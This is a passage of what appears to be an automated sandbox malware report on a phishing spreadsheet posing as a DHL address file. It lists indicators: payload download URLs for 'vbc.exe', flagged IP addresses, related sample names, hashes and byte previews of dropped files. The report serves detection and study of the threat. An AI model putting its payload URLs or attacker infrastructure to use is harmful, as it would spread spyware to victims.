                                              http://www.crc.bg0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://crl.chambersign.org/publicnotaryroot.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.a-cert.at/certificate-policy.html0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.wellsfargo.com/certpolicy0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://secure.comodo.com/CPS0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.comsign.co.il/cps0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown

                                                      Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      199.193.7.228
                                                      unknownUnited States
                                                      22612NAMECHEAP-NETUSfalse
                                                      192.210.214.178
                                                      unknownUnited States
                                                      36352AS-COLOCROSSINGUStrue

                                                      General Information

                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                      Analysis ID:339078
                                                      Start date:13.01.2021
                                                      Start time:13:16:03
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 8m 0s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:DHL-Address.xlsx
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed:6
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.expl.evad.winXLSX@6/10@5/2
                                                      EGA Information:Failed
                                                      HDC Information:
                                                      • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                                      • Quality average: 47.3%
                                                      • Quality standard deviation: 33.5%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .xlsx
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Scroll down
                                                      • Close Viewer
                                                      Warnings:
                                                      Show All
                                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Excluded IPs from analysis (whitelisted): 67.26.137.254, 8.248.145.254, 67.26.73.254, 8.248.115.254, 8.253.204.120, 205.185.216.42, 205.185.216.10, 93.184.221.240
                                                      • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      13:17:04API Interceptor91x Sleep call for process: EQNEDT32.EXE modified
                                                      13:17:08API Interceptor885x Sleep call for process: vbc.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      199.193.7.228shipping-document.xlsxGet hashmaliciousBrowse
                                                        iVUeQOg6LO.exeGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exeGet hashmaliciousBrowse
                                                            DHL-document.xlsxGet hashmaliciousBrowse
                                                              wCRnCAMZ3yT8BQ2.exeGet hashmaliciousBrowse
                                                                Mj1eX5GWJxDRnuk.exeGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Trojan.Inject4.6535.8815.exeGet hashmaliciousBrowse
                                                                    shipping document.xlsxGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Trojan.Inject4.6512.28917.exeGet hashmaliciousBrowse
                                                                        p72kooG5ak.exeGet hashmaliciousBrowse
                                                                          additional items.xlsxGet hashmaliciousBrowse
                                                                            swift copy 1f354972.exeGet hashmaliciousBrowse
                                                                              DB_DHL_AWB_00117980920AD.exeGet hashmaliciousBrowse
                                                                                Payment Advice - Advice Ref[G20376302776].pptx.exeGet hashmaliciousBrowse
                                                                                  Payment Reminder & SOA 202020121158.exeGet hashmaliciousBrowse
                                                                                    kg.exeGet hashmaliciousBrowse
                                                                                      logo.exeGet hashmaliciousBrowse
                                                                                        Pictures.exeGet hashmaliciousBrowse
                                                                                          7iZX0KCH4C.exeGet hashmaliciousBrowse
                                                                                            Al-Hbb_Doc-EUR_Pdf.exeGet hashmaliciousBrowse
                                                                                              192.210.214.178shipping-document.xlsxGet hashmaliciousBrowse
                                                                                              • globuserinessserverfiletransferprotocol.mangospot.net/vnc/vbc.exe
                                                                                              DHL-document.xlsxGet hashmaliciousBrowse
                                                                                              • globuserinessserverfiletransferprotocol.mangospot.net/vnc/vbc.exe
                                                                                              shipping document.xlsxGet hashmaliciousBrowse
                                                                                              • 192.210.214.178/reg/vbc.exe

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              smtp.privateemail.comshipping-document.xlsxGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              iVUeQOg6LO.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              DHL-document.xlsxGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              wCRnCAMZ3yT8BQ2.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              Mj1eX5GWJxDRnuk.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              SecuriteInfo.com.Trojan.Inject4.6535.8815.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              shipping document.xlsxGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              SecuriteInfo.com.Trojan.Inject4.6512.28917.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              p72kooG5ak.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              additional items.xlsxGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              swift copy 1f354972.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              DB_DHL_AWB_00117980920AD.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              Payment Advice - Advice Ref[G20376302776].pptx.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              Payment Reminder & SOA 202020121158.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              kg.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              logo.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              Pictures.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              PO48905232020.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              7iZX0KCH4C.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228

                                                                                              ASN

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              NAMECHEAP-NETUSNew FedEx paper work review.exeGet hashmaliciousBrowse
                                                                                              • 198.54.122.60
                                                                                              PO-000202112.exeGet hashmaliciousBrowse
                                                                                              • 63.250.34.114
                                                                                              urgent specification request.exeGet hashmaliciousBrowse
                                                                                              • 198.54.117.210
                                                                                              g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                                                              • 198.54.117.210
                                                                                              shipping-document.xlsxGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              Project review_Pdf.exeGet hashmaliciousBrowse
                                                                                              • 198.54.117.215
                                                                                              iVUeQOg6LO.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              mscthef-Fichero-ES.msiGet hashmaliciousBrowse
                                                                                              • 162.255.118.194
                                                                                              SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              Purchase Order -263.exeGet hashmaliciousBrowse
                                                                                              • 162.0.232.59
                                                                                              Duty checklist and PTP letter.exeGet hashmaliciousBrowse
                                                                                              • 162.255.119.136
                                                                                              zz4osC4FRa.exeGet hashmaliciousBrowse
                                                                                              • 162.0.238.245
                                                                                              0XrD9TsGUr.exeGet hashmaliciousBrowse
                                                                                              • 198.54.117.216
                                                                                              DHL-document.xlsxGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              RFQ 41680.xlsxGet hashmaliciousBrowse
                                                                                              • 198.54.117.211
                                                                                              Invoice.exeGet hashmaliciousBrowse
                                                                                              • 162.213.255.55
                                                                                              wCRnCAMZ3yT8BQ2.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                              • 68.65.122.35
                                                                                              INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                              • 198.54.125.162
                                                                                              al9LrOC8eM.exeGet hashmaliciousBrowse
                                                                                              • 162.213.253.37
                                                                                              AS-COLOCROSSINGUSshipping-document.xlsxGet hashmaliciousBrowse
                                                                                              • 192.210.214.178
                                                                                              1gEpBw4A95.exeGet hashmaliciousBrowse
                                                                                              • 107.172.188.113
                                                                                              IMG_73344332#U00e2#U20ac#U00aegpj.exeGet hashmaliciousBrowse
                                                                                              • 192.210.138.60
                                                                                              DHL-document.xlsxGet hashmaliciousBrowse
                                                                                              • 192.210.214.178
                                                                                              ORDER#9403.exeGet hashmaliciousBrowse
                                                                                              • 198.12.76.78
                                                                                              shipping document.xlsxGet hashmaliciousBrowse
                                                                                              • 192.210.214.178
                                                                                              DHL-ADDRESS.xlsxGet hashmaliciousBrowse
                                                                                              • 192.210.214.177
                                                                                              home.css.ps1Get hashmaliciousBrowse
                                                                                              • 107.175.49.49
                                                                                              DHL ADDRESS.xlsxGet hashmaliciousBrowse
                                                                                              • 192.210.214.177
                                                                                              PolicyUpdate.htmGet hashmaliciousBrowse
                                                                                              • 107.172.191.160
                                                                                              202101041.htmGet hashmaliciousBrowse
                                                                                              • 104.168.28.144
                                                                                              IMG_84755643#U00e2#U20ac#U00aegpj.exeGet hashmaliciousBrowse
                                                                                              • 192.210.138.60
                                                                                              202101041.htmGet hashmaliciousBrowse
                                                                                              • 104.168.28.144
                                                                                              eeFX76545672.htmLGet hashmaliciousBrowse
                                                                                              • 23.94.5.133
                                                                                              PO-JQ1125742021.xlsxGet hashmaliciousBrowse
                                                                                              • 198.12.125.25
                                                                                              TTR payment amount 131,000 USD.xlsxGet hashmaliciousBrowse
                                                                                              • 216.170.114.70
                                                                                              KBC Enquiry No.20201228.xlsxGet hashmaliciousBrowse
                                                                                              • 216.170.114.70
                                                                                              BANK SWIFT.xlsxGet hashmaliciousBrowse
                                                                                              • 216.170.114.70
                                                                                              Payment_details.exeGet hashmaliciousBrowse
                                                                                              • 198.12.76.78
                                                                                              SWIFT COPY AMOUNT OF US 49.676,30 FOR SMX022-10-20 DATED 23122020.xlsxGet hashmaliciousBrowse
                                                                                              • 198.23.207.5

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                              Category:dropped
                                                                                              Size (bytes):58936
                                                                                              Entropy (8bit):7.994797855729196
                                                                                              Encrypted:true
                                                                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):326
                                                                                              Entropy (8bit):3.1132326309774547
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:kKmLZwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:eLWkPlE99SNxAhUegeT2
                                                                                              MD5:1F8086C4F7DE9AC50C354544138EFB63
                                                                                              SHA1:DF1CE6541A5C69D8733233F74788499C244C345C
                                                                                              SHA-256:D38B35A19ECD3018DF239EC1F944BC797B1FC5F9F81BD0EB3BD10CCD30E1637D
                                                                                              SHA-512:110F038BDB200C93D09A7391CD6BD6F8F25A4CF916FD3AAE3E87302B33F58DFBBC82670129A2FA0BA76CA16615F161B41C9678B5A95C533B9F22E99C52501AB3
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview: p...... ........r.......(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:downloaded
                                                                                              Size (bytes):843776
                                                                                              Entropy (8bit):7.300736524263088
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:8XT4rp65D+SL7y7INIIdGZMonTVA2Wsa8tpJKS:VhSJNILZn62WJ8td
                                                                                              MD5:B232B5C7754D932B07C0D47F934EFBFE
                                                                                              SHA1:7C3D92552F6EBAB8956727BEECAAC5D22C87A55B
                                                                                              SHA-256:3311CEA59262B019A69FB72B72A36FC8E55D48A0F14F853B3A52FC8740542E99
                                                                                              SHA-512:4E3ABE570FA413FB74B1EFCF56560D5275CBCAF8217779E46DC65E13C2185C23F0BE2B01B91DCB5AEAD24C6F68E8F84B432B7EFBA87F2CC835BFA2848A406740
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:low
                                                                                              IE Cache URL:http://globuserinessserverfiletransferprotocol.mangospot.net/csrss/vbc.exe
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............P.............>.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H.......<X...............................................................(....*&..(.....*.s ........s!........s"........s#........s$........*...0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*&..(*....*...0..<........~.....(+.....,!r...p.....(,...o-...s.............~.....+..*.0...........~.....+..*".......*.0...........(....r=..p~....o/....+..*...0..<........~.....(+.....,!rG..p.....(,
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\102D7B51.jpeg
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                              Category:dropped
                                                                                              Size (bytes):48770
                                                                                              Entropy (8bit):7.801842363879827
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                              MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                              SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                              SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                              SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B636490.emf
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                              Category:dropped
                                                                                              Size (bytes):1099960
                                                                                              Entropy (8bit):2.0152876288887174
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:WXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:EahIFdyiaT2qtXw
                                                                                              MD5:6DAD8275F83B986347FE666567C7FFD0
                                                                                              SHA1:51F5A7972D7E082B5EE36B2680EEA2EE75BBFEEE
                                                                                              SHA-256:03B22F8AD84430F5C1064C38D88F66F2A224BF97DDC82A21AAB379C6078B917D
                                                                                              SHA-512:32BB953D0F9DB9FA01FA1874A229766EB6ED57F177B18748899EC32375DB070AC32C7DBFBA08305F69C81401135397651D2FED6B4FFFC93844734BEB1E8E7106
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................)...).......).t.)..N.R..)...).....\.)...)..N.R..)...). ....ySQ..)...). .........E..zSQ............?...............................X...%...7...................{ .@................C.a.l.i.b.r...............).X.....). .)..2LQ........\.).\.)..{JQ......)...E.dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC5A891E.jpeg
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                              Category:dropped
                                                                                              Size (bytes):48770
                                                                                              Entropy (8bit):7.801842363879827
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                              MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                              SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                              SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                              SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                              C:\Users\user\AppData\Local\Temp\CabCFB4.tmp
                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                              Category:dropped
                                                                                              Size (bytes):58936
                                                                                              Entropy (8bit):7.994797855729196
                                                                                              Encrypted:true
                                                                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                              C:\Users\user\AppData\Local\Temp\TarCFB5.tmp
                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):152533
                                                                                              Entropy (8bit):6.31602258454967
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                              MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                              SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                              SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                              SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                              C:\Users\user\Desktop\~$DHL-Address.xlsx
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
